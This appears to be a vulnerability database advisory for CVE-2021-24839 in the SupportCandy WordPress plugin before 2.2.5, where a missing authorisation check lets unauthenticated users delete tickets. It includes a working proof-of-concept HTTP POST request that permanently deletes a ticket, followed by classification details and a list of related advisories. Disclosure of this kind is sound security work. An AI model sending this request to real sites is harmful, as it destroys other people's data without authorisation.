SupportCandy < 2.2.5 – Unauthenticated Arbitrary Ticket Deletion | CVE 2021-24839 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CRSF checks in its wpsc_tickets AJAX action, which could allow unauthenticated users to call it and delete arbitrary tickets via the set_delete_permanently_bulk_ticket setting_action. Other actions may be affected as well.

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 81
Connection: close

action=wpsc_tickets&setting_action=set_delete_permanently_bulk_ticket&ticket_id=3

Affects Plugins

Fixed in 2.2.5

References

CVE

YouTube Video

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

Brandon Roldan

Submitter

Brandon Roldan

Submitter twitter

Verified

Yes

WPVDB ID

5e6e63c2-2675-4b8d-9b94-c16c525a1a0e

Timeline

Publicly Published

2022-01-05 (about 2 years ago)

Added

2022-01-05 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2023-06-02

Title

VK Blocks < 1.57.1.0 - Contributor+ Settings Update via REST API

Published

2021-08-31

Title

WooCommerce Dynamic Pricing & Discounts < 2.4.2 - Unauthenticated Settings Import to Stored XSS

Published

2023-09-03

Title

FileOrganizer < 1.0.3 - Admin+ Arbitrary File Access

Published

2021-05-26

Title

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Unauthenticated Redirect Export

Published

2021-10-05

Title

JobSearch WP Job Board < 1.8.2 - Unauthenticated Plugin's Settings Update